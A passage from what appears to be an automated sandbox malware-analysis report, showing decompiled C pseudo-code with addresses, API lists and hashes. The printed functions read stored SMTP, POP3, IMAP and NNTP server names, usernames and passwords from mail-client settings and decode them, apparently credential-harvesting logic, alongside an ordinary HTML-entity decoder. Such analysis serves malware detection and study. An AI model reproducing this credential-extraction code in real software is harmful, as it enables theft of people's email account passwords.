				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
				E00402197( &_v936);
				E00402197( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403371(__edi, "SMTPServer",  &_v664);
				E00403371(__edi, "ESMTPUsername",  &_v404);
				E00403371(__edi, "ESMTPPassword",  &_v276);
				E00403371(__edi, "POP3Server",  &_v1596);
				E00403371(__edi, "POP3Username",  &_v1336);
				_t35 = E00403371(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E00403392( &_v276);
					_t35 = E004023C6( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E00403392( &_v1208);
					return E004023C6( &_v1868, _t48, _a4);
				}
				return _t35;
			}


















                                                                                                                                                                  0x004033b1
                                                                                                                                                                  0x004033c1
                                                                                                                                                                  0x004033cc
                                                                                                                                                                  0x004033d3
                                                                                                                                                                  0x004033d4
                                                                                                                                                                  0x004033da
                                                                                                                                                                  0x004033e0
                                                                                                                                                                  0x004033f3
                                                                                                                                                                  0x004033fd
                                                                                                                                                                  0x0040340f
                                                                                                                                                                  0x00403421
                                                                                                                                                                  0x00403433
                                                                                                                                                                  0x00403445
                                                                                                                                                                  0x00403457
                                                                                                                                                                  0x00403463
                                                                                                                                                                  0x0040346b
                                                                                                                                                                  0x00403479
                                                                                                                                                                  0x00403479
                                                                                                                                                                  0x00403485
                                                                                                                                                                  0x0040348d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040349b
                                                                                                                                                                  0x004034a2

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                  • API String ID: 3963849919-1658304561
                                                                                                                                                                  • Opcode ID: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                                                                                                                                                                  • Instruction ID: ad4fe9f44f4ec6704836124f0b121ca839780027ba1e1250375890495da90f14
                                                                                                                                                                  • Opcode Fuzzy Hash: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                                                                                                                                                                  • Instruction Fuzzy Hash: F421BEB1C0022C6EDB61EF118D86FED7B7C9F45705F4000ABAA48B6092DB7C5BC59E59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FEB1, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                                                  			E0040FEB1(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406541( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                                                                                                                                  0x0040febc
                                                                                                                                                                  0x0040fec3
                                                                                                                                                                  0x0040feca
                                                                                                                                                                  0x0040fed1
                                                                                                                                                                  0x0040fed8
                                                                                                                                                                  0x0040fedf
                                                                                                                                                                  0x0040fee6
                                                                                                                                                                  0x0040feea
                                                                                                                                                                  0x0040feee
                                                                                                                                                                  0x0040fef2
                                                                                                                                                                  0x0040fef6
                                                                                                                                                                  0x0040fefa
                                                                                                                                                                  0x0040fefe
                                                                                                                                                                  0x0040ff08
                                                                                                                                                                  0x0040ff12
                                                                                                                                                                  0x0040ff1c
                                                                                                                                                                  0x0040ff26
                                                                                                                                                                  0x0040ff30
                                                                                                                                                                  0x0040ff3a
                                                                                                                                                                  0x0040ff44
                                                                                                                                                                  0x0040ff4e
                                                                                                                                                                  0x0040ff58
                                                                                                                                                                  0x0040ff62
                                                                                                                                                                  0x0040ff6c
                                                                                                                                                                  0x0040ff76
                                                                                                                                                                  0x0040ff80
                                                                                                                                                                  0x0040ff8a
                                                                                                                                                                  0x0040ff94
                                                                                                                                                                  0x0040ff9e
                                                                                                                                                                  0x0040ffa8
                                                                                                                                                                  0x0040ffb2
                                                                                                                                                                  0x0040ffbc
                                                                                                                                                                  0x0040ffc6
                                                                                                                                                                  0x0040ffd0
                                                                                                                                                                  0x0040ffda
                                                                                                                                                                  0x0040ffe4
                                                                                                                                                                  0x0040ffee
                                                                                                                                                                  0x0040fff8
                                                                                                                                                                  0x00410002
                                                                                                                                                                  0x0041000c
                                                                                                                                                                  0x00410016
                                                                                                                                                                  0x00410020
                                                                                                                                                                  0x0041002a
                                                                                                                                                                  0x00410034
                                                                                                                                                                  0x0041003e
                                                                                                                                                                  0x00410048
                                                                                                                                                                  0x00410052
                                                                                                                                                                  0x0041005c
                                                                                                                                                                  0x00410066
                                                                                                                                                                  0x00410070
                                                                                                                                                                  0x0041007a
                                                                                                                                                                  0x00410084
                                                                                                                                                                  0x0041008e
                                                                                                                                                                  0x00410098
                                                                                                                                                                  0x004100a2
                                                                                                                                                                  0x004100ac
                                                                                                                                                                  0x004100b6
                                                                                                                                                                  0x004100c0
                                                                                                                                                                  0x004100ca
                                                                                                                                                                  0x004100d4
                                                                                                                                                                  0x004100de
                                                                                                                                                                  0x004100e8
                                                                                                                                                                  0x004100f2
                                                                                                                                                                  0x004100fc
                                                                                                                                                                  0x00410106
                                                                                                                                                                  0x00410110
                                                                                                                                                                  0x0041011a
                                                                                                                                                                  0x00410124
                                                                                                                                                                  0x0041012e
                                                                                                                                                                  0x00410138
                                                                                                                                                                  0x00410142
                                                                                                                                                                  0x0041014c
                                                                                                                                                                  0x00410156
                                                                                                                                                                  0x00410160
                                                                                                                                                                  0x0041016a
                                                                                                                                                                  0x00410174
                                                                                                                                                                  0x0041017e
                                                                                                                                                                  0x00410188
                                                                                                                                                                  0x00410192
                                                                                                                                                                  0x0041019c
                                                                                                                                                                  0x0041019f
                                                                                                                                                                  0x004101a3
                                                                                                                                                                  0x004101a5
                                                                                                                                                                  0x004101a9
                                                                                                                                                                  0x004101b3
                                                                                                                                                                  0x004101bd
                                                                                                                                                                  0x004101c7
                                                                                                                                                                  0x004101d1
                                                                                                                                                                  0x004101db
                                                                                                                                                                  0x004101e5
                                                                                                                                                                  0x004101ef
                                                                                                                                                                  0x004101f9
                                                                                                                                                                  0x00410203
                                                                                                                                                                  0x0041020d
                                                                                                                                                                  0x00410217
                                                                                                                                                                  0x00410221
                                                                                                                                                                  0x0041022b
                                                                                                                                                                  0x00410235
                                                                                                                                                                  0x0041023f
                                                                                                                                                                  0x00410249
                                                                                                                                                                  0x00410253
                                                                                                                                                                  0x0041025a
                                                                                                                                                                  0x00410261
                                                                                                                                                                  0x00410268
                                                                                                                                                                  0x0041026f
                                                                                                                                                                  0x00410276
                                                                                                                                                                  0x0041027d
                                                                                                                                                                  0x00410284
                                                                                                                                                                  0x0041028b
                                                                                                                                                                  0x00410292
                                                                                                                                                                  0x00410299
                                                                                                                                                                  0x004102a0
                                                                                                                                                                  0x0041048e
                                                                                                                                                                  0x00410491
                                                                                                                                                                  0x00410497
                                                                                                                                                                  0x0041049a
                                                                                                                                                                  0x004104ad
                                                                                                                                                                  0x004104a6
                                                                                                                                                                  0x004104a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004104a6
                                                                                                                                                                  0x0041049a
                                                                                                                                                                  0x004102a7
                                                                                                                                                                  0x004102b6
                                                                                                                                                                  0x004102b9
                                                                                                                                                                  0x004102bd
                                                                                                                                                                  0x004102c0
                                                                                                                                                                  0x0041043d
                                                                                                                                                                  0x00410441
                                                                                                                                                                  0x0041047b
                                                                                                                                                                  0x0041047e
                                                                                                                                                                  0x00410447
                                                                                                                                                                  0x0041044a
                                                                                                                                                                  0x0041044f
                                                                                                                                                                  0x00410453
                                                                                                                                                                  0x00410458
                                                                                                                                                                  0x0041045f
                                                                                                                                                                  0x0041045f
                                                                                                                                                                  0x00410458
                                                                                                                                                                  0x00410461
                                                                                                                                                                  0x00410461
                                                                                                                                                                  0x0041047f
                                                                                                                                                                  0x00410480
                                                                                                                                                                  0x00410480
                                                                                                                                                                  0x00410487
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410487
                                                                                                                                                                  0x004102c6
                                                                                                                                                                  0x004102c9
                                                                                                                                                                  0x004102cc
                                                                                                                                                                  0x004102d0
                                                                                                                                                                  0x004102da
                                                                                                                                                                  0x004102e0
                                                                                                                                                                  0x004102e5
                                                                                                                                                                  0x004102ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102ec
                                                                                                                                                                  0x004102f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004102f2
                                                                                                                                                                  0x004102fa
                                                                                                                                                                  0x00410405
                                                                                                                                                                  0x00410405
                                                                                                                                                                  0x00410409
                                                                                                                                                                  0x0041040c
                                                                                                                                                                  0x00410414
                                                                                                                                                                  0x0041041c
                                                                                                                                                                  0x00410425
                                                                                                                                                                  0x0041042a
                                                                                                                                                                  0x0041042f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410431
                                                                                                                                                                  0x00410438
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041043a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041043a
                                                                                                                                                                  0x0041046e
                                                                                                                                                                  0x00410471
                                                                                                                                                                  0x00410472
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410472
                                                                                                                                                                  0x00410300
                                                                                                                                                                  0x00410300
                                                                                                                                                                  0x00410304
                                                                                                                                                                  0x00410309
                                                                                                                                                                  0x004103ba
                                                                                                                                                                  0x004103ba
                                                                                                                                                                  0x004103be
                                                                                                                                                                  0x004103c0
                                                                                                                                                                  0x004103cf
                                                                                                                                                                  0x004103cf
                                                                                                                                                                  0x004103d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103c6
                                                                                                                                                                  0x004103d8
                                                                                                                                                                  0x004103da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103e2
                                                                                                                                                                  0x004103eb
                                                                                                                                                                  0x004103f0
                                                                                                                                                                  0x004103f8
                                                                                                                                                                  0x004103fb
                                                                                                                                                                  0x004103fe
                                                                                                                                                                  0x004103ff
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103ff
                                                                                                                                                                  0x004103c8
                                                                                                                                                                  0x004103cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103ce
                                                                                                                                                                  0x004103ce
                                                                                                                                                                  0x004103d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410318
                                                                                                                                                                  0x00410318
                                                                                                                                                                  0x0041031a
                                                                                                                                                                  0x00410340
                                                                                                                                                                  0x00410340
                                                                                                                                                                  0x00410344
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410337
                                                                                                                                                                  0x004103b5
                                                                                                                                                                  0x0041034a
                                                                                                                                                                  0x0041034e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041035c
                                                                                                                                                                  0x00410364
                                                                                                                                                                  0x0041036d
                                                                                                                                                                  0x00410372
                                                                                                                                                                  0x0041037d
                                                                                                                                                                  0x0041038c
                                                                                                                                                                  0x00410394
                                                                                                                                                                  0x00410395
                                                                                                                                                                  0x00410399
                                                                                                                                                                  0x004103a5
                                                                                                                                                                  0x004103ab
                                                                                                                                                                  0x004103ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004103ac
                                                                                                                                                                  0x00410339
                                                                                                                                                                  0x0041033d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041033f
                                                                                                                                                                  0x0041033f
                                                                                                                                                                  0x00410346
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410346
                                                                                                                                                                  0x00410309
                                                                                                                                                                  0x00410325
                                                                                                                                                                  0x0041032b
                                                                                                                                                                  0x0041032c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041032c
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • strlen.MSVCRT ref: 004102D0
                                                                                                                                                                  • strncmp.MSVCRT(?,00414FF4,00000000,00414FF4,?,?,?), ref: 004102E0
                                                                                                                                                                  • memcpy.MSVCRT ref: 0041035C
                                                                                                                                                                  • atoi.MSVCRT ref: 0041036D
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00410399
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                  • API String ID: 1895597112-3210201812
                                                                                                                                                                  • Opcode ID: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                                                                                                                                                                  • Instruction ID: 0fafc75884cef128377fd64f4b7a28f8ddc93d47313dbc0ddeda27c5dc7f40ea
                                                                                                                                                                  • Opcode Fuzzy Hash: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF1D5B1805A98DEDF21CF94C9887DDBBB0BB85308F1481CAD5586B241C7B94AC9CF9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410D67, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E00410D67(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060DA(0xff, _t201 + 0x870, E00406BA3( *(_t201 + 0x460)));
					_t123 = E00406BA3( *_t204);
					_t195 = _t201 + 0xf84;
					E004060DA(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060DA(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060DA(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060DA(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060DA(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060DA(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060DA(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060DA(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060DA(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060DA(0xff, _t201 + 0xe70, E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060DA(0xff, _t201 + 0xe70, E00406BA3( *(_t201 + 0x460)));
					_t63 = E004060DA(0xff, _t201 + 0x1584, E00406BA3( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					L35:
					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004120B4();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004120B4();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
